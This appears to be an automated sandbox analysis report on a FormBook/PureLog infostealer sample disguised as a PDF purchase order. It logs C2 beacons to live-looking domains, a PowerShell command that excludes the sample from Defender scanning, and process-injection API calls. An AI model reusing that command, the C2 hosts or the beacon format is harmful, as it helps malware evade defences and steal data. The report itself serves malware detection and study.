                                                                              Data Ascii: t0A=5Oga9EzjhERs1mnoeP/aj2qtsK4LNTdrD1NtcF91hBxLI2dAisjuVMzCUZGDmW1qRDVXdco2XOPYcLK5y1H1yfYi8m90BAEfYKWjJPk8xA0una9Y8UKwoZRsLcXX96Ic9TJjlN40kObep6EmttRzP+N64ZVbYrrlONAhtK6rL4j1ACmuQBZuAR3iXKXOnwjvBgX07lX9BANSrsAlnhk4DUIlij49Epk+e7Qf71vUcVUBTe465h8TrCOCg1xiEtHp54qU3XTsTptTCcu06pgvg0X7n1C2LoycrRRYHWgYLjmTojBxv3WNecJJ5xKKRgLyktegV3y4XpCeuKRFeM2ghJ8f2vq1QAbZ+3gASMqtbjSvJGpc4KQc9Mwn++rAQcomU/RWnSGylUtdxUjNd1Y+cs8fIlplx7hpeFkbdCOqRHLsND9vK7xkzQZfvJJXLehZlywEi073zrOWN0jT5AUYZnVzm+DUWG1xfeWpFbti+8oEzBFlu1Yni0bQHCw33rJkyiJ5P0qoyANdj9BnOxE8yzvX6sgk3V2S4oyesRf0jjaIJJrZ7w9qn0JpNHOKk1e6NRgEjX/goynL41N3rBtPy/JITO1NvWGctcF3yv+MhiQdWzwH/nsWkx1/mj1huTBZ5qNtMx5n+0H+LOJDNMm5DVee8+tBhZRSCPFpNC5JAbJ6jVKjlrjq7S8jNLNU7mrAFD0AVRgcnkTRqlhkfkHcASVch4x2w8H57xD/0+S52LAZ4EO2UXiVTSgAeZuDUB6opVLJPk4s3cyrtX9rrkq1msoP69DaoY4hMO1czp/GkUD6mbOACAYUIfx8XnxrmfOPqzw5WUF8UpciTJX0n3XGyDl8naxh1rOHlHYhmFdwcIGc1fHSeIaz+IsIyi4ibft0g7sPnQcJbaowtu+BCTiFynaHmAHem8XoXU5jILLj6eOl5uv2vy8gyrPeR0ckx14DYVCvsNS65j1EfeZA0aMj3kZrNaHzdgmmjl3R2CLX8q8Fho4C [TRUNCATED]
                                                                              Jan 14, 2025 12:03:41.980588913 CET | 309 | IN | HTTP/1.1 405 Not Allowed
                                                                              server: nginx/1.20.1
                                                                              date: Tue, 14 Jan 2025 11:03:41 GMT
                                                                              content-type: text/html
                                                                              content-length: 157
                                                                              connection: close
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              28 | 192.168.2.5 | 49498 | 213.171.195.105 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:43.941021919 CET | 402 | OUT | GET /he9k/?t0A=0MI6+xzwqxZaqD2cO/aG/zu1oIMhaBkQNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOxoEk511kfBxpEvGLE/kVuVEOyttA6Fi+saUHPe6X4Jt0hg==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.aloezhealthcare.info
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:03:44.546082973 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              server: nginx/1.20.1
                                                                              date: Tue, 14 Jan 2025 11:03:44 GMT
                                                                              content-type: text/html
                                                                              content-length: 2862
                                                                              last-modified: Wed, 27 Nov 2024 10:28:56 GMT
                                                                              etag: "6746f468-b2e"
                                                                              accept-ranges: bytes
                                                                              connection: close
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel="stylesheet" href="/styles/css/index.css"> <link rel="shortcut icon" href="https://static.fasthosts.co.uk/icons/favicon.ico" type="image/x-icon" /> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-199510482-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-199510482-1'); </script> </head><body> <div class="container"> <nav class="logo"> <a href="https://fasthosts.co.uk/" rel="nofollow"> <img src="/assets/fasthosts-logo-secondary.svg" alt="Fasthosts"></img> </a> </nav> <main> <h2>Welcome to <span class="domain
                                                                              Jan 14, 2025 12:03:44.546106100 CET | 1236 | IN
                                                                              Data Ascii: Var"></span></h2> <p> This domain name is parked for FREE by <strong><a href="https://fasthosts.co.uk/" rel="nofollow">fasthosts.co.uk</a></strong> </p> <div class="row"> <div class="card card--is-cta
                                                                              Jan 14, 2025 12:03:44.546124935 CET | 448 | IN
                                                                              Data Ascii: o.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_contact">Contact us</a> </main> </div> <script> const cleanHostname = document.location.hostname.indexOf("www.") && document.location.hostname || do
                                                                              Jan 14, 2025 12:03:44.546148062 CET | 176 | IN
                                                                              Data Ascii: `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_dac` </script></body></html>


                                                                              Session ID:29
                                                                              Source IP:192.168.2.5
                                                                              Source Port:49499
                                                                              Destination IP:85.159.66.93
                                                                              Destination Port:80
                                                                              PID:2520
                                                                              Process:C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp:Jan 14, 2025 12:03:49.684063911 CET
                                                                              Bytes transferred:674
                                                                              Direction:OUT
                                                                              Data:
                                                                              POST /coi2/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.letsbookcruise.xyz
                                                                              Origin: http://www.letsbookcruise.xyz
                                                                              Referer: http://www.letsbookcruise.xyz/coi2/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=wcM0ZpOUiZfIqTQ2KnUnQlUiR3AFjQ8/Y2vc3HfhJB1FLGkVKvf36bFQnOy3VdjeNCWNaI2s0PPrZ0RtlzruG5bG8mCRQxYpBmKqN2fqdBGeOOVh9rQsSXdKGrmGFzWpqq8tntigaEeGx+FAYmOZEqvylBQLQSzFKi8Cxqih+Zfzj3pwYNXbM9/dPlJTs91euLIs6wg=


                                                                              Session ID:30
                                                                              Source IP:192.168.2.5
                                                                              Source Port:49500
                                                                              Destination IP:85.159.66.93
                                                                              Destination Port:80
                                                                              PID:2520
                                                                              Process:C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp:Jan 14, 2025 12:03:52.226914883 CET
                                                                              Bytes transferred:694
                                                                              Direction:OUT
                                                                              Data:
                                                                              POST /coi2/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.letsbookcruise.xyz
                                                                              Origin: http://www.letsbookcruise.xyz
                                                                              Referer: http://www.letsbookcruise.xyz/coi2/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=wcM0ZpOUiZfIpzA2PAInBVUtPHAFow94Y2zc3GbxJyRFIjYVLuf35bFQouyyINjrNCqvaKis0OvrZxttlgzhFJbY0GCXdRYpBmKqNyPUdBeeO+lhv6Qjb3dJPLmGBzXiqq8fnumKaBaGx8dAWTyWd6vwohQYQgugMxYZxanYve7pmBYaCvfzfdTlf2Bk9NU30oYckn2kFubg+lZS0SKl3x76i4bw


                                                                              Target ID:0
                                                                              Start time:06:00:45
                                                                              Start date:14/01/2025
                                                                              Path:C:\Users\user\Desktop\PO 2025918 pdf.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\PO 2025918 pdf.exe"
                                                                              Imagebase:0xea0000
                                                                              File size:765'952 bytes
                                                                              MD5 hash:625D2FAE7B900A58C7E9DAED1F85CAB3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2220434300.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2211278593.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2200491712.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:06:01:01
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                                                                              Imagebase:0x7f0000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:06:01:01
                                                                              Start date:14/01/2025
                                                                              Path:C:\Users\user\Desktop\PO 2025918 pdf.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\PO 2025918 pdf.exe"
                                                                              Imagebase:0xaa0000
                                                                              File size:765'952 bytes
                                                                              MD5 hash:625D2FAE7B900A58C7E9DAED1F85CAB3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2460325125.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:06:01:01
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:06:01:19
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe"
                                                                              Imagebase:0x5c0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3896619038.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:8
                                                                              Start time:06:01:21
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                                                              Imagebase:0x3d0000
                                                                              File size:19'456 bytes
                                                                              MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3895986128.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:10
                                                                              Start time:06:01:34
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe"
                                                                              Imagebase:0x5c0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:11
                                                                              Start time:06:01:46
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x7ff79f9e0000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                                Execution Graph

                                                                                Execution Coverage:10.2%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:1.9%
                                                                                Total number of Nodes:162
                                                                                Total number of Limit Nodes:8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Ppjq
                                                                                • API String ID: 0-111704681
                                                                                • Opcode ID: c3dfbc35dd9d66a2a9abdc120eedf5aed011928cdb3a8000c584b61a46945a62
                                                                                • Instruction ID: 1e3e6d1e26fb7828beaa553bc421835481d815477227851e648d988c3572aa43
                                                                                • Opcode Fuzzy Hash: c3dfbc35dd9d66a2a9abdc120eedf5aed011928cdb3a8000c584b61a46945a62
                                                                                • Instruction Fuzzy Hash: 2481B474E002199FDB15DFA9D984AEEBBF6FF88300F20812AD918A7365DB346945CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Ppjq
                                                                                • API String ID: 0-111704681
                                                                                • Opcode ID: d92469e92cf6c2a05d74435b3ddd91e1bf5eb8dfdcc49b8f7ae8be6eaaed482c
                                                                                • Instruction ID: 0078764ac48f2da58bdd9825deabf3944b3e2b76ed7ba6c8622ae97a2eefea52
                                                                                • Opcode Fuzzy Hash: d92469e92cf6c2a05d74435b3ddd91e1bf5eb8dfdcc49b8f7ae8be6eaaed482c
                                                                                • Instruction Fuzzy Hash: E681B574E002189FCB15DFA9D984AEEBBF6FF88300F208129D819A7365DB346945CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: r
                                                                                • API String ID: 0-1812594589
                                                                                • Opcode ID: 366e284be8ffb8c7b85edd104d3eadbaf3b55388a6f1057d5ec573996bcb895f
                                                                                • Instruction ID: 6b4d573d2bc612b67bc53a07f1b531e328edf7004672c5c17be620731df66626
                                                                                • Opcode Fuzzy Hash: 366e284be8ffb8c7b85edd104d3eadbaf3b55388a6f1057d5ec573996bcb895f
                                                                                • Instruction Fuzzy Hash: B3515C34D09228DFDB04CFAAD4449AEBBBAFF4A301F15D1A9E415E76A2C7359942CF40
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20ca6825cbe1c251c7137bfb55415d399d9e7ddf77304691c62f6f13e2941668
                                                                                • Instruction ID: 1a7a0ebc3fc3264adbc5caeead1580e22a21ba3851afca7821e0136c3745bc79
                                                                                • Opcode Fuzzy Hash: 20ca6825cbe1c251c7137bfb55415d399d9e7ddf77304691c62f6f13e2941668
                                                                                • Instruction Fuzzy Hash: 59C1C074E08228CFDB14CFA9C8457AEBBF6BF89304F14D16AD508A7255DB309985CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6618cdf97ebbc7f27e8fb4b7c9cb6ba9b9748adac966dd8810e0aa4f6a8eaded
                                                                                • Instruction ID: 51f8a595d2e2f6d18c76ca859cb18d78201e1509114a4dd57bc45e62640a8201
                                                                                • Opcode Fuzzy Hash: 6618cdf97ebbc7f27e8fb4b7c9cb6ba9b9748adac966dd8810e0aa4f6a8eaded
                                                                                • Instruction Fuzzy Hash: 7CC1D174E08228CFDB14CFAAC8457AEBBF6BF89304F14D1AAD418A7255DB349985CF41
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6935456e24bd09cfa1a86c8f806a7f26950c21131ac10822fbddbf9a612b89f0
                                                                                • Instruction ID: c44d19bb924bfc0acc0bf6be74fdb218711a7f265fe5d67c480b34709acc3be7
                                                                                • Opcode Fuzzy Hash: 6935456e24bd09cfa1a86c8f806a7f26950c21131ac10822fbddbf9a612b89f0
                                                                                • Instruction Fuzzy Hash: 272104B1D046598BDB18CFABCD043EEBAFAAFC9341F04C06AD409A62A5DB7509458F90
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82601257d36ae8acd9685536911166c8a4d5e8769b8cab25598feaddc425fdde
                                                                                • Instruction ID: 6bf19618a83c63505091e6d2d6ee9ed17b6322b2a933a7899971ab20b7d7e9ef
                                                                                • Opcode Fuzzy Hash: 82601257d36ae8acd9685536911166c8a4d5e8769b8cab25598feaddc425fdde
                                                                                • Instruction Fuzzy Hash: 3F110DB4908268CFCB24CF55D8487F8BBB5FB5A311F0955E9C40DA7292D7344A86DF10

                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C20276
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 58cd857beb6e56cd54beabdee8cbdad5b65f30c660325fb22139cda0d5dc6958
                                                                                • Instruction ID: b282c905a798d526b85fe699dd9ebcc0e3b34cbb3620ac86ec3377cf65d31f76
                                                                                • Opcode Fuzzy Hash: 58cd857beb6e56cd54beabdee8cbdad5b65f30c660325fb22139cda0d5dc6958
                                                                                • Instruction Fuzzy Hash: 68914EB1D0022ACFDF14CF68C9817DEBBB2BF48310F14856AD849A7254DB749A86DF91

                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C20276
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 47e498f04489b8f6e94da6a64e338db4ba931011fdae2e82a6a0f32b7ba2d4bc
                                                                                • Instruction ID: d9e9ac4578f562df6793d3bc6254d5c40573a6c5bb1af6aca1f651cf22aabd6a
                                                                                • Opcode Fuzzy Hash: 47e498f04489b8f6e94da6a64e338db4ba931011fdae2e82a6a0f32b7ba2d4bc
                                                                                • Instruction Fuzzy Hash: 1E914EB1D0022ACFDF14CF69C9817DEBBB2BF48310F14856AD809A7254DB749A86DF91

                                                                                Control-flow Graph

                                                                                • Graph starting at 1a0b3c1-1a0b3ce (node and edge list omitted); API call shown in graph: GetModuleHandleW
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0494210572acf3fc66d37ba9a098d7f99c6773df0a1a68669393fa543e7c0884
                                                                                • Instruction ID: 6020a968422d3fe4307406b5909ce0d73abb320dcdfaf1c7fb7ef49613a0119c
                                                                                • Opcode Fuzzy Hash: 0494210572acf3fc66d37ba9a098d7f99c6773df0a1a68669393fa543e7c0884
                                                                                • Instruction Fuzzy Hash: 30816570A00B058FD725CF29E64476ABBF5FF88300F10896DD58AD7A81EB35E945CBA0

                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01A059C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: fd9b7d6806464eb9c88bc67eada10c4d61fd88ec1f46e8af3755baf6c4661f86
                                                                                • Instruction ID: b40977f4a9335b60d323c152785276f9bee9d2fa01caefaac6de9615d245b617
                                                                                • Opcode Fuzzy Hash: fd9b7d6806464eb9c88bc67eada10c4d61fd88ec1f46e8af3755baf6c4661f86
                                                                                • Instruction Fuzzy Hash: FF4114B0C00319CBDF25DFA9D884BCDBBB5BF49304F20806AD408AB291DB756946CF90

                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01A059C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 9cd5322de04edb3b7cb46262a28d1935df67f303c41b9a7d2352a9fc33622cf1
                                                                                • Instruction ID: 3f8f8e181bd6a77f8fcddf7a20051f47939f5abf67f6ddf70ff8cc131f2101b4
                                                                                • Opcode Fuzzy Hash: 9cd5322de04edb3b7cb46262a28d1935df67f303c41b9a7d2352a9fc33622cf1
                                                                                • Instruction Fuzzy Hash: 2B41E2B0C0071DCBDB25DFAAC884B9DBBF5BF49304F20806AD418AB255DB756946CF90

                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0932FBD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 1644b94c919483f7a391ac442a143e2a86812d3bb46e84499c5b189365ff7d45
                                                                                • Instruction ID: d702e4f5fbc6ed8ee523c4cad6669693150e9529cd8ad8eb529b7f4505ac8707
                                                                                • Opcode Fuzzy Hash: 1644b94c919483f7a391ac442a143e2a86812d3bb46e84499c5b189365ff7d45
                                                                                • Instruction Fuzzy Hash: BC2128B59003599FDB10DFA9C885BDEBBF5FF48310F108429E959A7240C7789554CFA0

                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0932FBD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: bd1b1042288621df9e324caf16c7e040a505108166b0be6521a05534be6340fa
                                                                                • Instruction ID: fd8ea02907188f1f1dc5629090bda32f72028f6518766b0bf143a61f66148464
                                                                                • Opcode Fuzzy Hash: bd1b1042288621df9e324caf16c7e040a505108166b0be6521a05534be6340fa
                                                                                • Instruction Fuzzy Hash: 552127B59003599FDB10DFAAC885BEEBBF5FF48310F108429E919A7240C7789944CFA0

                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0932FA26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
